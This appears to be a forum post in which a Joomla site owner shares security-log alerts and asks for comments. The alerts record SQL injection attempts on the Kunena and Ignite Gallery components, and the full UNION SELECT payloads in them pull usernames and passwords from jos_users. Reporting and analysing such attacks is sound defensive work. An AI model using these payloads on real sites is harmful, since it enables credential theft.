Сегодня сразу две атаки:
** Union Select [GET:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [GET:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Union Select [REQUEST:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [REQUEST:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
**PAGE / SERVER INFO
*REMOTE_ADDR :
46.37.166.22
*HTTP_USER_AGENT :
Mozilla/5.0
*REQUEST_METHOD :
GET
*QUERY_STRING :
option=com_kunena&func=userlist&search='+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--+;
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;
И еще одна:
** Union Select [GET:gallery] => -1 union select 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Table name in url [GET:gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Union Select [REQUEST:gallery] => -1 union select 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Table name in url [REQUEST:gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
**PAGE / SERVER INFO
*REMOTE_ADDR :
46.37.166.22
*HTTP_USER_AGENT :
Mozilla/5.0
*REQUEST_METHOD :
GET
*QUERY_STRING :
option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users--
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_ignitegallery
-[task] => view
-[gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from -- users--
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_ignitegallery
-[task] => view
-[gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from -- users--
Прокомментируйте, пожалуйста! Спасибо!